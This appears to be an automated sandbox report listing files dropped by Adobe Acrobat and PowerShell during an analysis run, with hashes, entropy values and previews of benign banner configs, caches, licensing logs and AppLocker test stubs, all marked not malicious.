                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):289
                                                                                      Entropy (8bit):5.3119292718131845
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfYdPeUkwRe9:YvXKX1fmcgc5Gg8Ukee9
                                                                                      MD5:B28B4F2956E91C83B015316244C8371E
                                                                                      SHA1:8E90C2B8A34301612600A4A815DEC90E4242FAFD
                                                                                      SHA-256:5832694675EF188AE83A4669CA301A583716B619F2EE1B817E8B859342D7ED7E
                                                                                      SHA-512:0E808828598B169F1B2E3F8FAA48494691F4978666009D6635FE328E47035FED048D37209D0B840D0C09A67CFCDC3B387EB5CF376EDF3D024BCA1856452FAB7E
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):284
                                                                                      Entropy (8bit):5.297871965494094
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf+dPeUkwRe9:YvXKX1fmcgc5G28Ukee9
                                                                                      MD5:A384B507009B5964868E6A4626584330
                                                                                      SHA1:B167CB25583253C72AA68078FF310A68EF5EA57D
                                                                                      SHA-256:80BA5EC4E10C2647762A4A565A910A7CE37A17197DA20943EB7486F68ED4AFCE
                                                                                      SHA-512:76A4BC6A6B951F9784654487BCB7F117A4EDA86F406F35166B0D32EF459793201A5C14C138AC70A01DF8B2AF6D41F49F92D65291DE7F1BDD15E174109B81BCA0
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):291
                                                                                      Entropy (8bit):5.29539438136462
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfbPtdPeUkwRe9:YvXKX1fmcgc5GDV8Ukee9
                                                                                      MD5:D7B2D3747703B803FB8172C69504AC7E
                                                                                      SHA1:429130B7A9A20D2BD59D84A4D6806193BF475355
                                                                                      SHA-256:31A7234A8E4801368EBE86605D8463B55A543F0DA0031D6A7FBD7FB6F617883A
                                                                                      SHA-512:43BE61CB92C003539C304A8C4427A93A978672F7C7FB2DB4FFBC29DFCE6E4414F4B9B7752BBE14EAEB1C7AE70669631710170E1B97219F91136F6EBED3AF45A5
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):287
                                                                                      Entropy (8bit):5.299236686201587
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJf21rPeUkwRe9:YvXKX1fmcgc5G+16Ukee9
                                                                                      MD5:A6250AD9D39315E9B5F2992DAECB8522
                                                                                      SHA1:82172A345F0614F9D04B2CD613675A2992A27301
                                                                                      SHA-256:690C77085CC4525F82AEFCAE0FDE73E283B40113FFD67B9459BB7C8AF774FC69
                                                                                      SHA-512:3EF5857B9875728C2C68135371204F0A5C4AE170367ABDCBD1DFE1806FA5D42D7694BE03D32B3C92C44DCC4F3302F73255F2BF5E1FED6A5AF46FD9E0914657AC
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1090
                                                                                      Entropy (8bit):5.67008342908652
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yv6X1fbgamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSTr:YvbBgkDMUJUAh8cvMX
                                                                                      MD5:D287D28AFCE409731876C3AECE8E27A8
                                                                                      SHA1:2109D464B6CF5590851E34C854E9EB99521D2468
                                                                                      SHA-256:05DE2681C2C7131E14F84CF603A4D69EFA4364B0670F18A828BDFF61311FA095
                                                                                      SHA-512:AB5D4F723C249B8687B8172D0A30B0FB72967A01B92DB4970A94A1D2D8331E304FECECFE46BB1ED215ED3BB4BDDB80F1A021C869DF6BA830E33B50534B2998D0
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):286
                                                                                      Entropy (8bit):5.275281920399625
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJfshHHrPeUkwRe9:YvXKX1fmcgc5GUUUkee9
                                                                                      MD5:BA5A25AE7D1F6E222586014F3DEEC331
                                                                                      SHA1:A33DCB369DA9050F0BA737EAFD0419A45879661C
                                                                                      SHA-256:542D539B0F3B225252CB4D703E526E51F41FB302A8C6E256D1EAAF7ADB30EA1D
                                                                                      SHA-512:BE501D81CDC2A32A58D133F3626DBE03A44D6A73BB0330DA792B7699993AF29EE6E4C4E03E3FF886871733E22EE49C3E7C70B8EF4267F0FB2916509262403434
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):282
                                                                                      Entropy (8bit):5.282882633097287
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:YEQXJ2HXhbL+dwVmnZiQ0YdcKoAvJTqgFCrPeUkwRe9:YvXKX1fmcgc5GTq16Ukee9
                                                                                      MD5:47AAACBAF3BB201DFB948309537370DF
                                                                                      SHA1:D3FA6A1D973FD15A0A76B7E2FFB24BB7ED4B71CF
                                                                                      SHA-256:BD7F2E10D01FAD24174402751E47B993AFA3D28F04104CFFB861FD4E1F28B573
                                                                                      SHA-512:20596888C4C3A5EF61C77D4B67D47A629CCEAB8E4935BD45469536758531772E5F46144146D6A1970677D80D0A54D54E996A179109FAAA7ECB76268BC5110E04
                                                                                      Malicious:false
                                                                                      Preview:{"analyticsData":{"responseGUID":"1cbfb135-9aba-413d-a1fb-74f3097d2b82","sophiaUUID":"7B9B8415-3339-46DA-BE0A-54DDE09AC518"},"encodingScheme":true,"expirationDTS":1734785565807,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:e:e
                                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                      Malicious:false
                                                                                      Preview:....
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):2814
                                                                                      Entropy (8bit):5.134392305323593
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Y8kzdaU4aySzRdEWI3alMOUDDj1/j0StGC+J12Sy0CP2LS1h/CANpcOc8G5xx92/:YrHnUT1LA939CP/JlcOHGl92xt
                                                                                      MD5:FC4A6DFC681849BE9C0DADC95E37FAD4
                                                                                      SHA1:AEE77C61B19E1433153837B1E06EE06A9277FAAD
                                                                                      SHA-256:DACA785412069ED871E737DA92CF858D4D5AC28DC7755074F9BC34E094B2DD9C
                                                                                      SHA-512:8F0D9E13109BD65E3FFA18576DF0646DBE1D1E69AFCA0E677776B46115C0358FBA447872DF7DD50DF590D8B31B26525D2E8D29CE9AD895053E9AEFB7BB46F279
                                                                                      Malicious:false
                                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"8720bcb9a43ad49ba952249e8d00dad2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608894000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"dfe6af3190c3905c04962657cc6ca492","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734608894000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b52f82eaf013c422a1ba952ec4d6f961","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734608894000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"804c638325da2697d878cf23bbcf78a6","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734608894000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2812f3631b50d860a8673b07a1a47be1","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","size":289,"ts":1734608894000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"98eb034af6042a18acce4e023d7e523d","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":2
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 24, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 24
                                                                                      Category:dropped
                                                                                      Size (bytes):12288
                                                                                      Entropy (8bit):1.1452120183851335
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLhx/XYKQvGJF7urs3ETRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudC:TFl2GL7ms3AXc+XcGNFlRYIX2v3k2m
                                                                                      MD5:ADBDBCE5900F2CF461E09F14E486C6BA
                                                                                      SHA1:88AD3352AF06E8EAF71C13D590F4ABE54A0D6B40
                                                                                      SHA-256:D73D5F7B1CAC38310390D33E85A37F4959850075A185DFC2808A80B143909BC6
                                                                                      SHA-512:73A4710F47E446018C45A3C6ECB925260DEF4AF2A498EB8DF1EF8609EA5ED5A0A32E9F4B4BF480A7AE9744E0C03B538014116FD855F1B99DB5EC938DD8641DF2
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:SQLite Rollback Journal
                                                                                      Category:dropped
                                                                                      Size (bytes):8720
                                                                                      Entropy (8bit):1.5495171159034844
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:7+tBWETUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLuxLnqLxx/r:7MBW3Xc+XcGNFlRYIX2vWnqVl2GL7msd
                                                                                      MD5:822BE47C1A761E200727C24C5715A810
                                                                                      SHA1:C1896CF4405887F57DD8ACF6D52D73CB841F02F3
                                                                                      SHA-256:4AEA5DF9C126705552CE22A36F97A0A8795418B139D0BF5EF19FC9B142BEF695
                                                                                      SHA-512:2543946960DC2DA988B82D0367A9619B92D421822BF2000F271E7C3A6FD95E11D0214DF1CC684E922E08956D5424AE1C558E27D07EFDC2606FA9C5BFD1BC35E3
                                                                                      Malicious:false
                                                                                      Preview:.... .c.......tc..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................b..b.b.b.b.b.b.b.b.b.b.b.b.b..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):66726
                                                                                      Entropy (8bit):5.392739213842091
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgzTmk3mQck2C351zooRYH/Wg4RrYyu:6a6TZ44ADEvmk3Zck5tYH+5FK
                                                                                      MD5:DB14CE893137DDB5B96997E1FECDD15F
                                                                                      SHA1:2477CCFCBA6A316AE5E99D22AC58D530D524067B
                                                                                      SHA-256:4A12D58EC73A35E2758BFBE4D21A262B7543F183C96F046B6F06AFDD50CEB544
                                                                                      SHA-512:3CB369956A90BD325D7F4396E5332E39B05C6DBCD9112B57EED452734CC09DA0623F014678DBEA16ECA00DA358F0CEEFF01586DA4CD8263C47C8F5AFDAE2E59F
                                                                                      Malicious:false
                                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):1.1940658735648508
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlllul79Yll//Z:NllUGl
                                                                                      MD5:851849E23E67E904A88407CDB0964345
                                                                                      SHA1:4B33734D0E176A208FE58C3EB552CA42A9F6ECD9
                                                                                      SHA-256:CCDB092D6A7666749275AC8E7AFBCB9CC36BA225054ABFD6F8C94D152FB65BCB
                                                                                      SHA-512:030ACC5F1C6C53410065D6DD7BD8FB63BF9A5B4CCD31AC05A35A4D061F595954FECCF9B93EC9FE195269018687EA10F963B7C5B82CEA305304B7781E1B23CAAA
                                                                                      Malicious:false
                                                                                      Preview:@...e.................................j.}............@..........
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.5197430193686525
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8mUlAQMH:Qw946cPbiOxDlbYnuRK5
                                                                                      MD5:D6D85D561CEB89AE278F1FD424D104D7
                                                                                      SHA1:E87E94E4A4C9CA792951A420718C462F43BF506F
                                                                                      SHA-256:24F3B2782D43AD7A0F532E932C398131F5DFDE6F871F90E9CE4C5B3BCC2C2756
                                                                                      SHA-512:1AA87BDC7FD4E4219D398CA6DBCB753BD2E1B6F79928607FF259C3C23682360AC8F76213219DEFF999C0B5267B73BF9171AC715CA0053E5E693A8B9B8A0E58FE
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.9./.1.2./.2.0.2.4. . .0.6.:.4.8.:.1.1. .=.=.=.....
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.338264912747007
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb
                                                                                      MD5:128A51060103D95314048C2F32A15C66
                                                                                      SHA1:EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB
                                                                                      SHA-256:601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713
                                                                                      SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                                      Malicious:false
                                                                                      Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):15114
                                                                                      Entropy (8bit):5.376811207828648
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:VMgIZdcuIoXfLXzvfGgsPAihbOuRqGqxRXnoh1jrbe1u+syVeXJEChRYRJIJHZ5L:+Lw
                                                                                      MD5:17374E6F0F2A3B069C6E1A3EDC90A4BA
                                                                                      SHA1:75B5957EC806749DE84359DEDAB998509F022DA5
                                                                                      SHA-256:5AAAA5A593E554BB800F9FC92068D44623FFA6027977B6411C9632D893048228
                                                                                      SHA-512:F111085788C679887F5915021ABBF70E1B75EA25014E6B43F2C5F2FB20F74EDC88403CA320E1BB48D1501BE0212D2766C4A23404244CEC2086889143DD4B92E7
                                                                                      Malicious:false
                                                                                      Preview:SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:855-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:858-0500 ThreadID=5976 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:858-0500 ThreadID=5976 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:859-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=b07ee2f4-3536-45bc-987d-688acba73c21.1734608884855 Timestamp=2024-12-19T06:48:04:859-0500 ThreadID=5976 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):29752
                                                                                      Entropy (8bit):5.405982353124853
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbi+ggcPgViP/yv+Bev+gnOziUcq:V3fOCIdJDeJH4
                                                                                      MD5:6F6D12BFD519F7F67C51E8F60561EC8E
                                                                                      SHA1:82A9B64B74397773A7C8CE78207FB62EC49C2DEB
                                                                                      SHA-256:F9B7C74D7C7FE43C5FE35580EEC422CC1244302E95F7FF2661777B35A774C544
                                                                                      SHA-512:62476E0494B59DA87849BD58E9347E02261EEA1C2D177B64613C9662CBF91EF7E8AEF656CF4C6CB3CB3B611FA595F65F26B9B027B84CE874F98ADA6D1DDDFCED
                                                                                      Malicious:false
                                                                                      Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                      Category:dropped
                                                                                      Size (bytes):758601
                                                                                      Entropy (8bit):7.98639316555857
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                      Malicious:false
